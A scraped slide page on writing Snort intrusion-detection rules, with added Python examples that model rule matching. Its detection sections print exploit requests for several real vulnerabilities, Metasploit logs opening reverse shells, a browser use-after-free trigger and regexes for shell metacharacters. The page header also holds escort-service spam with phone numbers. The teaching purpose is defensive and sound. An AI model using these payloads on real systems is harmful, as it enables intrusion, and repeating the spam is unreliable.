IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍾 8923113531 🎰 Avail...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
A Call to Action for Generative AI in 2024

Introduction to Snort Rule Writing

  • 2. Snort Rule Syntax
    # rule header
    alert tcp any any -> 192.168.1.0/24 111 (
    Header fields, left to right: rule action, protocol, src address, src port, dst address, dst port.
  • 3. Snort Rule Syntax
    # rule option format
    alert tcp any any -> 192.168.1.0/24 111 (
    msg:"Rule Message";
    Each option is written as rule option, colon, rule option argument, terminated by a semicolon.
  • 4. rule option: content
    # content match example
    alert tcp any any -> 192.168.1.0/24 111 (
    content:"ABCD";
    # is equivalent to:
    content:"|41 42 43 44|";
    The content match finds a static pattern in network data.
  • 5. content modifiers: nocase
    # content match modifiers: nocase
    alert tcp any any -> 192.168.1.0/24 111 (
    # match "ABCD" or "abcd" etc.
    content:"ABCD"; nocase;
    nocase makes a content match case insensitive. content matches are case sensitive by default.
  • 6. content modifiers: offset
    # content match modifiers: offset
    alert tcp any any -> 192.168.1.0/24 111 (
    # skip 2 bytes before searching for "ABCD"
    content:"ABCD"; offset:2;
    offset requires the match to occur after the designated offset in network data.
  • 7. content modifiers: depth
    # content match modifiers: depth
    alert tcp any any -> 192.168.1.0/24 111 (
    # match "ABCD" within the first 4 bytes of the payload
    content:"ABCD"; depth:4;
    depth restricts how far Snort should search for the specified pattern.
  • 8. content modifiers: distance
    # content match modifiers: distance
    alert tcp any any -> 192.168.1.0/24 111 (
    # find "DEF" 1 byte after "ABC"
    content:"ABC"; content:"DEF"; distance:1;
    distance specifies how far into a payload Snort should ignore before starting to search for the specified pattern, relative to the end of the previous pattern match.
  • 9. content modifiers: within
    # content match modifiers: within
    alert tcp any any -> 192.168.1.0/24 111 (
    # find "EFG" within 10 bytes of "ABC"
    content:"ABC"; content:"EFG"; within:10;
    within makes sure that at most N bytes are between pattern matches.
  • 10. negated content match
    # negated content match
    alert tcp any any -> 192.168.1.0/24 111 (
    # make sure "EFG" is NOT within 10 bytes of "ABC"
    content:"ABC"; content:!"EFG"; within:10;
    content matches can be negated.
  • 11. content buffers
    # content buffer example
    alert tcp any any -> 192.168.1.0/24 111 (
    # match "ABC" within the HTTP URI
    content:"ABC"; http_uri;
    content matches can be restricted to a payload location, such as the HTTP URI.
  • 12. content buffers
    POST /index.php HTTP/1.1
    Host: example.com
    Content-Length: 28
    Content-Type: application/x-www-form-urlencoded
    Cookie: this_is_a_cookie=this_is_its_value

    firstparam=one&secondparam=two
    Buffers: http_method, http_uri, http_header, http_cookie, http_client_body
  • 13. content modifiers: fast_pattern
    # fast_pattern example
    alert tcp any any -> 192.168.1.0/24 111 (
    # set "ABC" as the rule fast_pattern
    content:"ABC"; fast_pattern;
    fast_pattern explicitly specifies the content match within a rule to be used with the fast pattern matcher. The fast_pattern serves as the "entrance" condition for rule evaluation.
  • 14. content modifiers: fast_pattern
    # fast_pattern:only; example
    alert tcp any any -> 192.168.1.0/24 111 (
    # set "ABC" as the rule fast_pattern
    content:"ABC"; fast_pattern:only;
    fast_pattern:only; selects the content match to be used in the fast pattern matcher for the rule and also specifies that this match will not be evaluated again when the rule "enters".
  • 15. rule option: pcre
    # pcre rule option example
    alert tcp any any -> 192.168.1.0/24 111 (
    # match the following regex
    pcre:"/A[BC]D/i";
    pcre declares a Perl compatible regular expression for matching on payload data. Flags can be specified after the closing slash, e.g. /i for case insensitivity.
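The content modifiers on slides 4 to 10 and the pcre option on slide 15 are easiest to understand by running them against byte payloads. The following is an added example written for this page, not Snort's code: a minimal model that parses the option syntax from the slides (content with `!` and `|hex|` bytes, nocase, offset, depth, distance, within, pcre with the i/s flags) and evaluates it with the same left-to-right, relative-to-previous-match semantics the slides describe. Payloads are constructed; the handling of `isdataat`, buffers and other options is deliberately left out.

```python
import re

# Added example for this page (not Snort's code): a minimal model of the
# content modifiers and pcre option described on the slides, so their
# semantics can be checked against byte payloads. Only the options the
# slides cover are parsed. Option arguments containing ';' or ':' inside
# quotes are not handled by this small parser.

def decode_content(text):
    """Expand a content argument such as 'AB|43 44|' into bytes; text
    between pipe characters is hex, exactly as Snort reads it."""
    out = bytearray()
    for i, part in enumerate(text.split("|")):
        out += bytes.fromhex(part) if i % 2 else part.encode()
    return bytes(out)

def parse_options(text):
    """Parse 'content:"ABC"; content:!"EFG"; within:10;' into a list of
    option dicts; modifiers attach to the preceding content match."""
    opts = []
    for raw in text.split(";"):
        raw = raw.strip()
        if not raw:
            continue
        key, _, val = raw.partition(":")
        key, val = key.strip(), val.strip()
        if key == "content":
            negated = val.startswith("!")
            val = val[1:].strip() if negated else val
            opts.append({"content": decode_content(val.strip('"')), "negated": negated})
        elif key == "nocase":
            opts[-1]["nocase"] = True
        elif key in ("offset", "depth", "distance", "within"):
            opts[-1][key] = int(val)
        elif key == "pcre":
            regex, flags = val.strip('"')[1:].rsplit("/", 1)
            re_flags = (re.I if "i" in flags else 0) | (re.S if "s" in flags else 0)
            opts.append({"pcre": re.compile(regex.encode(), re_flags)})
        else:
            raise ValueError("unsupported option: " + key)
    return opts

def find_content(window, pattern, nocase):
    """Offset just past the first occurrence of pattern in window, or None."""
    if nocase:
        window, pattern = window.lower(), pattern.lower()
    idx = window.find(pattern)
    return None if idx < 0 else idx + len(pattern)

def evaluate(payload, options):
    """Evaluate the options left to right. doe ('detect offset end') is the
    position just after the previous successful content match; distance and
    within are measured from it, offset and depth from the payload start."""
    doe = 0
    for opt in options:
        if "pcre" in opt:
            if not opt["pcre"].search(payload):
                return False
            continue
        pat = opt["content"]
        if "distance" in opt or "within" in opt:
            start = doe + opt.get("distance", 0)
            window = payload[start:start + opt["within"]] if "within" in opt else payload[start:]
        else:
            start = opt.get("offset", 0)
            window = payload[start:start + opt["depth"]] if "depth" in opt else payload[start:]
        end = find_content(window, pat, opt.get("nocase", False))
        if opt["negated"]:
            if end is not None:
                return False        # a negated pattern was found: rule fails
            continue                # doe is not moved by a negated match
        if end is None:
            return False
        doe = start + end
    return True

def match(payload, rule_body):
    """Does the option list in rule_body match payload?"""
    return evaluate(payload, parse_options(rule_body))

if __name__ == "__main__":
    # constructed payloads exercising the slides' examples
    print(match(b"xxABCD", 'content:"ABCD"; offset:2;'))                       # True
    print(match(b"ABC123456EFG", 'content:"ABC"; content:"EFG"; within:10;'))  # True
    print(match(b"ABC123EFG", 'content:"ABC"; content:!"EFG"; within:10;'))    # False
```

Note how `within` bounds the search window so that the whole pattern must fit in the N bytes after the previous match, and how a negated match never advances the match pointer; both details matter when reading the rules later in the deck.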
  • 16. Traffic Triage and Isolation
    [Funnel diagram: Normal Traffic -> Vulnerable Application Traffic (fast_pattern content, etc.) -> Vulnerable Parameter Traffic (pcre, content, etc.) -> Vulnerability Condition. Axes: Traffic Volume (decreasing down the funnel), Speed (fast checks first, slow checks last), Traffic Type.]
  • 18. Detection Topics (current section: Buffer Overflow)
    Buffer Overflow, Command Injection, Directory Traversal, Use-After-Free, Remote File Include, Browser Plugins, Cross Site Scripting, Malware Command Traffic
  • 19. Buffer Overflow Overview
    Stack buffer overflow in AVM Fritz!Box daemon dsl_control. AVM Fritz!Box firmware fails to check the length of user supplied data in a 'se' or ScriptExecute command sent in a SOAP request to the dsl_control daemon.
  • 20. Buffer Overflow Overview
    dsl_cpi_cli_access.c registers the command 'se' to the DSL_CPE_CLI_ScriptExecute handler function:
    [...]
    DSL_CPE_CLI_CMD_ADD_COMM ( "se", "ScriptExecute", DSL_CPE_CLI_ScriptExecute, g_sSe);
    [...]
  • 21. Buffer Overflow Overview
    DSL_CLI_LOCAL DSL_int_t DSL_CPE_CLI_ScriptExecute([...])
    {
      [...]
      DSL_char_t sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0};
      if(DSL_CPE_CLI_CheckParamNumber(pCommands, 1, DSL_CLI_EQUALS) == DSL_FALSE)
      {
        return -1;
      }
      DSL_CPE_sscanf(pCommands, "%s", sFileName);
      [...]
  • 22. Buffer Overflow Overview
    The code calls the function DSL_CPE_sscanf in order to copy the value of the parameter pCommands to the local character array sFileName without restriction or bounds checking. The size of the vulnerable stack buffer is 256 bytes as indicated in dsl_cpi_cli_console.h:
    #define DSL_MAX_COMMAND_LINE_LENGTH 256
    Triggering the vulnerability is then a simple matter of sending >256 bytes in the first 'se' parameter.
  • 23. Buffer Overflow Exploit
    <?xml version="1.0" encoding="UTF-8"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ifx="urn:dsl_api">
      <SOAP-ENV:Body>
        <ifx:DslCpeCliAccess>
          <command>se "A"*300</command>
        </ifx:DslCpeCliAccess>
      </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
  • 24. Buffer Overflow Detection
    # vulnerable SOAP request
    # with at least 256 bytes
    # within <command></command>
    #
    content:"DslCpeCliAccess"; fast_pattern:only; http_client_body;
    content:"<command"; nocase; http_client_body;
    isdataat:256,relative;
    content:!"</command"; nocase; within:256; http_client_body;
    # stack buffer overflow (>256 bytes)
    # within param0: <command> se param0 </command>
    #
    pcre:"/<command[^>]*?>\s*se\s[^<]{256}/Pi";
  • 25. Buffer Overflow Detection
    alert tcp $EXTERNAL_NET any -> $HOME_NET 8080 (
      msg:"SERVER-WEBAPP AVM FritzBox dsl_control stack buffer overflow attempt";
      flow:to_server,established;
      content:"DslCpeCliAccess"; fast_pattern:only; http_client_body;
      content:"<command"; nocase; http_client_body;
      isdataat:256,relative;
      content:!"</command"; within:256; nocase; http_client_body;
      pcre:"/<command[^>]*?>\s*se\s[^<]{256}/Pi";
      metadata:policy security-ips drop, service http;
      classtype:attempted-admin;
    )
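The triage funnel on slide 16 and the AVM rule on slides 24 and 25 are two views of the same idea: cheap checks reject most traffic before the expensive regex runs. The following added example (not Snort's or Cisco's code) models that rule as three stages, fast_pattern, content/isdataat, pcre, and reports how deep each of several constructed SOAP bodies gets. The regex is the rule's own; `isdataat:256,relative` is modelled as "at least 256 bytes follow the previous match", which is this example's reading of the option rather than Snort's source.

```python
import re

# Added example (not Snort or Cisco code): the triage funnel from the
# "Traffic Triage and Isolation" slide applied to the AVM dsl_control rule.
# Request bodies are constructed here for illustration.

FAST_PATTERN = b"DslCpeCliAccess"
# the rule's pcre (P = http_client_body, i = case insensitive)
OVERFLOW_RE = re.compile(rb"<command[^>]*?>\s*se\s[^<]{256}", re.I)

def soap_request(command):
    """Constructed SOAP body in the shape shown on the exploit slide."""
    return (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"'
            b' xmlns:ifx="urn:dsl_api"><SOAP-ENV:Body><ifx:DslCpeCliAccess>'
            b'<command>' + command + b'</command>'
            b'</ifx:DslCpeCliAccess></SOAP-ENV:Body></SOAP-ENV:Envelope>')

def stage1_fast_pattern(body):
    """fast_pattern:only - a plain substring test, the cheapest check."""
    return FAST_PATTERN in body

def stage2_content_checks(body):
    """content:"<command"; nocase; isdataat:256,relative;
    content:!"</command"; nocase; within:256;
    isdataat is modelled as 'at least 256 bytes after the match' (this
    example's interpretation of the option)."""
    low = body.lower()
    idx = low.find(b"<command")
    if idx < 0:
        return False
    doe = idx + len(b"<command")
    if len(body) - doe < 256:
        return False
    return b"</command" not in low[doe:doe + 256]

def stage3_pcre(body):
    """The rule's pcre: the 'se' command followed by 256 bytes with no '<'."""
    return OVERFLOW_RE.search(body) is not None

def deepest_stage(body):
    """0 = rejected by fast_pattern, 1 = rejected by the content checks,
    2 = rejected by the pcre, 3 = every check passed (alert)."""
    for stage, check in enumerate((stage1_fast_pattern, stage2_content_checks, stage3_pcre)):
        if not check(body):
            return stage
    return 3

def funnel(bodies):
    """How many bodies stop at each stage, as on the triage slide."""
    counts = {0: 0, 1: 0, 2: 0, 3: 0}
    for body in bodies:
        counts[deepest_stage(body)] += 1
    return counts

SAMPLES = [
    b"GET /index.html HTTP/1.1\r\n\r\n",       # unrelated traffic
    soap_request(b"se script.txt"),            # legitimate short command
    soap_request(b"help " + b"B" * 300),       # long parameter, but not the 'se' command
    soap_request(b"se " + b"A" * 300),         # the overflow condition from the exploit slide
]

if __name__ == "__main__":
    print(funnel(SAMPLES))   # {0: 1, 1: 1, 2: 1, 3: 1}
```

Only the last sample reaches the pcre and alerts; the long `help` command shows why the regex, and not only the length check, is needed to isolate the vulnerability condition.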
  • 27. Detection Topics (current section: Command Injection)
    Buffer Overflow, Command Injection, Directory Traversal, Use-After-Free, Remote File Include, Browser Plugins, Cross Site Scripting, Malware Command Traffic
  • 28. Command Injection Overview
    CVE-2014-3805
    Command injection vulnerabilities in AlienVault OSSIM av-centerd, which accepts SOAP commands on port 40007. SOAP command 'get_log_line' parameter '$number_lines' and 'get_license' parameter '$license_type' are used in OS commands without sanitization.
  • 29. Command Injection Overview
    /usr/share/alienvault-center/lib/AV/CC/Util.pm
    sub get_log_line() {
      my ( $function_llamada, $name, $uuid, $admin_ip, $hostname, $r_file, $number_lines ) = @_;
      [...]
      # $number_lines used in OS command without sanitization
      my $command = "tail -$number_lines $r_file";
      my @content = `$command`;
      [...]
    }
  • 30. Command Injection Overview
    /usr/share/alienvault-center/lib/AV/CC/Util.pm
    sub get_license() {
      my ( $function_llamada, $name, $uuid, $admin_ip, $hostname, $license, $license_type ) = @_;
      [...]
      # $license_type used in OS command without sanitization
      my $package = system ("curl --proxy-anyauth -K /etc/curlrc http://[...]/avl/$license_type/[...]");
    }
  • 31. Command Injection Exploit
    POST /av-centerd HTTP/1.1
    Host: 172.16.8.223:40007
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 765
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "AV/CC/Util#get_log_line"

    <?xml version="1.0" encoding="UTF-8"?><soap:Envelope soap:encodingStyle[...]><soap:Body><get_log_line xmlns="AV/CC/Util"><c-gensym3 xsi:type="xsd:string">All[...]</c-gensym3><c-gensym13 xsi:type="xsd:string">&amp;&amp; perl -MMIME::Base64 -e &apos;system(decode_base64(&quot;cGVy[...]</c-gensym13></get_log_line></soap:Body></soap:Envelope>
  • 33. Command Injection Exploit
    msf exploit(alienvault_centerd_soap_exec) > exploit
    [*] Started reverse handler on 172.16.158.1:4444
    [*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.173:41320) at 2014-07-19 12:09:00 -0500
    id
    uid=0(root) gid=0(root) groups=0(root)
    remember traffic isolation...
  • 34. Command Injection Detection
    alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
      msg:"SERVER-WEBAPP AlienVault OSSIM get_log_line command injection attempt";
      flow:to_server,established;
      content:"/av-centerd"; nocase; http_uri;
      content:"<get_log_line"; fast_pattern; nocase; http_client_body;
      content:"xsd:string"; distance:0; nocase; http_client_body;
      pcre:"/xsd\x3astring[^>]*?>[^<]*?([\x3b\x7c\x26\x60]|\x24\x28)/Pi";
      metadata:service http;
      reference:cve,2014-3805;
      classtype:attempted-admin;
    )
  • 35. Command Injection Detection
    alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
      msg:"SERVER-WEBAPP AlienVault OSSIM get_license command injection attempt";
      flow:to_server,established;
      content:"/av-centerd"; nocase; http_uri;
      content:"<get_license"; fast_pattern; nocase; http_client_body;
      content:"xsd:string"; distance:0; nocase; http_client_body;
      pcre:"/xsd\x3astring[^>]*?>[^<]*?([\x3b\x7c\x26\x60]|\x24\x28)/Pi";
      metadata:service http;
      reference:cve,2014-3805;
      classtype:attempted-admin;
    )
  • 36. Command Injection Overview
    CVE-2014-5073
    OS command injection vulnerability in VMTurbo Operations Manager vmtadmin.cgi parameter 'fileDate'. If the 'callType' parameter is set to "DOWN" vmtadmin.cgi will pass the value of 'fileDate' to system().
  • 37. Command Injection Overview
    my $actiontype = $query->param("actionType");
    my $calltype = $query->param("callType");
    my $filedate = $query->param("fileDate");
    my $statusfile = (defined $filedate) ? $filedate : $mon.".".$mday." [...]
    [...]
    elseif ($calltype eq "DOWN") {
      [...]
      system("rm \"$upload_dir$statusfile\"");
      [...]
  • 38. Command Injection Exploit
    GET /cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP&fileDate=%22%60printf%20%27177105114[...] HTTP/1.1
    Host: 172.16.41.140
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 0
  • 40. Command Injection Exploit
    msf exploit(vmturbo_vmtadmin_exec_noauth) > exploit
    [*] Started reverse handler on 172.16.158.1:4444
    [*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.173:41320) at 2014-07-19 12:09:00 -0500
    id
    uid=0(root) gid=0(root) groups=0(root)
  • 41. Command Injection Detection
    alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
      msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt";
      flow:to_server,established;
      # Start by isolating traffic.
      content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri;
      content:"callType=DOWN"; nocase; http_uri;
      content:"fileDate="; nocase; http_uri;
      pcre:"/[?&]fileDate=[^&]*?([\x60\x3b\x7c]|[\x3c\x3e\x24]\x28)/Ui";
      metadata:policy security-ips drop, service http;
      reference:cve,2014-5073;
      classtype:attempted-admin;
    )
  • 42. Command Injection Detection
    alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
      msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt";
      flow:to_server,established;
      content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri;
      content:"callType=DOWN"; nocase; http_uri;
      content:"fileDate="; nocase; http_raw_uri;
      content:"%26"; distance:0; http_raw_uri;
      pcre:"/[?&]fileDate=[^&]*?%26/Ii";
      metadata:policy security-ips drop, service http;
      reference:cve,2014-5073;
      classtype:attempted-admin;
    )
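Slides 34 and 35 look for shell metacharacters inside the SOAP parameters, and slides 41 and 42 show two versions of the VMTurbo rule: one over the normalized URI, one over the raw URI looking for an encoded ampersand. The added example below (not the slides' code and not Snort's) runs those three pcre expressions over constructed requests. It approximates Snort's normalized `http_uri` buffer by percent-decoding the raw URI; that is an assumption about http_inspect, but it is enough to show why an `&` that only appears after decoding is invisible to a `[^&]*?` on the normalized buffer and why slide 42 moved the check to `http_raw_uri`.

```python
import re
from urllib.parse import unquote

# Added example, not from the slides and not Snort code: the pcre checks of
# the command injection rules run with Python's re over constructed requests.
# Percent-decoding stands in for Snort's normalized URI buffer (/U); the raw
# buffer (/I) is the request URI as sent. That stand-in is an assumption.

# AlienVault: a shell metacharacter (; | & `) or "$(" inside an xsd:string element
ALIENVAULT_RE = re.compile(
    rb"xsd\x3astring[^>]*?>[^<]*?([\x3b\x7c\x26\x60]|\x24\x28)", re.I)
# VMTurbo, slide 41: metacharacters in the normalized fileDate value
VMTURBO_NORM_RE = re.compile(
    rb"[?&]fileDate=[^&]*?([\x60\x3b\x7c]|[\x3c\x3e\x24]\x28)", re.I)
# VMTurbo, slide 42: an encoded ampersand in the raw fileDate value
VMTURBO_RAW_RE = re.compile(rb"[?&]fileDate=[^&]*?%26", re.I)

def normalize_uri(raw_uri):
    """Simplified stand-in for Snort's normalized http_uri buffer."""
    return unquote(raw_uri.decode("ascii", "replace")).encode("utf-8")

def alienvault_injection(uri, body):
    """Slides 34/35: /av-centerd in the URI, a get_log_line or get_license
    element in the body, then the pcre over the xsd:string parameters."""
    low = body.lower()
    if b"/av-centerd" not in uri.lower():
        return False
    if b"<get_log_line" not in low and b"<get_license" not in low:
        return False
    return ALIENVAULT_RE.search(body) is not None

def vmturbo_injection(raw_uri):
    """Return (slide41_hit, slide42_hit) for one request URI."""
    norm = normalize_uri(raw_uri)
    if b"/cgi-bin/vmtadmin.cgi" not in norm or b"calltype=down" not in norm.lower():
        return (False, False)
    return (VMTURBO_NORM_RE.search(norm) is not None,
            VMTURBO_RAW_RE.search(raw_uri) is not None)

# constructed inputs
SOAP_OK = (b'<soap:Body><get_log_line xmlns="AV/CC/Util">'
           b'<c-gensym3 xsi:type="xsd:string">All</c-gensym3>'
           b'<c-gensym13 xsi:type="xsd:string">20</c-gensym13>'
           b'</get_log_line></soap:Body>')
SOAP_BAD = SOAP_OK.replace(b">20<", b">20 &amp;&amp; id<")
URI_OK = b"/cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP&fileDate=Jan.1"
URI_BACKTICK = b"/cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP&fileDate=%22%60id%60"
URI_ENCODED_AMP = b"/cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP&fileDate=x%26%26id"

if __name__ == "__main__":
    print(alienvault_injection(b"/av-centerd", SOAP_BAD))   # True
    print(vmturbo_injection(URI_BACKTICK))                  # (True, False)
    print(vmturbo_injection(URI_ENCODED_AMP))               # (False, True)
```

The two VMTurbo results are complementary: the backtick form is caught by slide 41's normalized check and not by slide 42's, while the `%26%26` form decodes to `&&`, which terminates `[^&]*?` in the normalized buffer and is only caught on the raw URI.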
  • 44. Detection Topics (current section: Directory Traversal)
    Buffer Overflow, Command Injection, Directory Traversal, Use-After-Free, Remote File Include, Browser Plugins, Cross Site Scripting, Malware Command Traffic
  • 45. Directory Traversal Overview
    CVE-2014-2424
    Directory traversal vulnerability in Oracle Event Processing. FileUploadServlet function processUploadedFile() fails to properly sanitize the filename parameter value. The WMI service can be abused to convert the file upload into remote code execution without user interaction.
  • 46. Directory Traversal Overview
    private void processUploadedFile(FileItem paramFileItem)
    {
      try
      {
        // paramFileItem.getName() used to
        // create file without verification
        paramFileItem.write(new File(this.uploadLocation, paramFileItem.getName()));
      }
      catch (Exception localException)
      {
        [...]
      }
    }
  • 47. Directory Traversal Exploit
    POST /wlevs/visualizer/upload HTTP/1.1
    Host: 172.16.8.29:9002
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Type: multipart/form-data; boundary=_Part_732_2993821416_1334322828
    Content-Length: 2658

    --_Part_732_2993821416_1334322828
    Content-Disposition: form-data; name="uploadfile"; filename="../../../../../../../WINDOWS/system32/wbem/mof/klIvousnq.mof"
    Content-Type: application/octet-stream
    Content-Transfer-Encoding: binary

    #pragma namespace("\\\\.\\root\\cimv2")
    [...]
  • 49. Directory Traversal Exploit
    msf exploit(oracle_event_processing_upload) > rexploit
    [*] Reloading module...
    [*] Started reverse handler on 172.16.158.1:4444
    [*] 172.16.158.198:9002 - Generating payload and mof file...
    [*] 172.16.158.198:9002 - Uploading the exe payload hENIwUPM.exe...
    [*] 172.16.158.198:9002 - Uploading the MOF file klIvousnq.mof
    [*] Sending stage (769536 bytes) to 172.16.158.198
    [*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.198:1052) at 2014-06-29 15:42:37 -0500
    [+] Deleted wbem/mof/klIvousnq.mof
    [!] This exploit may require manual cleanup of 'hENIwUPM.exe' on the target
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
  • 50. Directory Traversal Detection
    #
    # Multipart POST
    #
    content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri;
    content:"filename"; nocase; http_client_body;
    content:"Content-Disposition"; nocase; http_client_body;
    pcre:"/filename\s*=\s*[^\r\n]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pi";
    #
    # Urlencoded POST
    #
    content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri;
    content:"filename="; nocase; http_client_body;
    pcre:"/(^|&)filename=[^&]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pim";
  • 51. Directory Traversal Detection
    alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
      msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt";
      flow:to_server,established;
      content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri;
      content:"filename"; nocase; http_client_body;
      content:"Content-Disposition"; nocase; http_client_body;
      pcre:"/filename\s*=\s*[^\r\n]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pi";
      metadata:policy balanced-ips drop, policy security-ips drop, service http;
      reference:cve,2014-2424;
      classtype:attempted-admin;
    )
  • 52. Directory Traversal Detection
    alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
      msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt";
      flow:to_server,established;
      content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri;
      content:"filename="; nocase; http_client_body;
      pcre:"/(^|&)filename=[^&]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pim";
      metadata:policy balanced-ips drop, policy security-ips drop, service http;
      reference:cve,2014-2424;
      classtype:attempted-admin;
    )
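Slides 50 to 52 split the traversal check into a multipart form and a urlencoded form because the filename reaches the server in two different encodings. The added example below (not the slides' own code and not Snort) keeps both regexes exactly as written on the slides and runs them over constructed upload bodies, dispatching on Content-Type the way the two rules do; the filename pattern comes from the exploit slide, everything else is constructed.

```python
import re

# Added example (not the slides' or Snort's code): the two traversal pcre
# checks from slides 50-52 applied to constructed upload bodies.

MULTIPART_RE = re.compile(
    rb"filename\s*=\s*[^\r\n]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)", re.I)
URLENCODED_RE = re.compile(
    rb"(^|&)filename=[^&]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)", re.I | re.M)

UPLOAD_URI = b"/wlevs/visualizer/upload"

def multipart_traversal(body):
    """Slide 51: content "filename" and "Content-Disposition" (nocase) in
    the client body, then the pcre over the disposition line."""
    low = body.lower()
    if b"filename" not in low or b"content-disposition" not in low:
        return False
    return MULTIPART_RE.search(body) is not None

def urlencoded_traversal(body):
    """Slide 52: content "filename=" (nocase), then the pcre anchored at
    the start of the body or at a parameter separator."""
    if b"filename=" not in body.lower():
        return False
    return URLENCODED_RE.search(body) is not None

def upload_traversal_alert(uri, content_type, body):
    """fast_pattern:only on the upload URI is the entrance condition;
    the body encoding then selects which of the two checks applies."""
    if UPLOAD_URI not in uri:
        return False
    if content_type.lower().startswith(b"multipart/form-data"):
        return multipart_traversal(body)
    return urlencoded_traversal(body)

def multipart_body(filename):
    """Constructed multipart body in the shape of the exploit slide."""
    return (b"--_Part_1\r\n"
            b'Content-Disposition: form-data; name="uploadfile"; filename="' + filename + b'"\r\n'
            b"Content-Type: application/octet-stream\r\n\r\n"
            b"#pragma namespace(...)\r\n--_Part_1--\r\n")

# traversal filename in the form shown on the exploit slide (constructed base name)
TRAVERSAL_NAME = b"../../../../../../../WINDOWS/system32/wbem/mof/x.mof"

if __name__ == "__main__":
    ctype = b"multipart/form-data; boundary=_Part_1"
    print(upload_traversal_alert(UPLOAD_URI, ctype, multipart_body(TRAVERSAL_NAME)))  # True
    print(upload_traversal_alert(UPLOAD_URI, ctype, multipart_body(b"report.mof")))   # False
    print(urlencoded_traversal(b"data=1&filename=..%2f..%2fx.mof"))                  # True
```

Both expressions accept the dots and separators either literally or percent-encoded (`\x2e`/`%2e`, `\x2f`/`%2f`, `\x5c`/`%5c`), and the urlencoded form's `(^|&)` anchor keeps a parameter such as `otherfilename=` from matching.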
  • 54. Detection Topics (current section: Use-After-Free)
    Buffer Overflow, Command Injection, Directory Traversal, Use-After-Free, Remote File Include, Browser Plugins, Cross Site Scripting, Malware Command Traffic
  • 55. Use-After-Free Overview
    CVE-2013-3893
    This vulnerability is triggered by Javascript that sets an onlosecapture() handler on the parent of two elements. This handler clears the DOM with document.write() when it is called. The Javascript then calls setCapture() on the parent and the child element. This triggers the onlosecapture() handler, freeing a reference with document.write(). After the free, the invalid reference will remain, causing a crash (or code execution) in MSHTML!CTreeNode::GetInterface.
  • 56. Use-After-Free Trigger
    function trigger() {
      var id_0 = document.createElement("sup");
      var id_1 = document.createElement("audio");
      document.body.appendChild(id_0);
      document.body.appendChild(id_1);
      id_1.applyElement(id_0);
      id_0.onlosecapture=function(e) {
        document.write("");
      }
      id_0.setCapture();
      id_1.setCapture();
    }
  • 57. Use-After-Free Trigger
    0:005> r
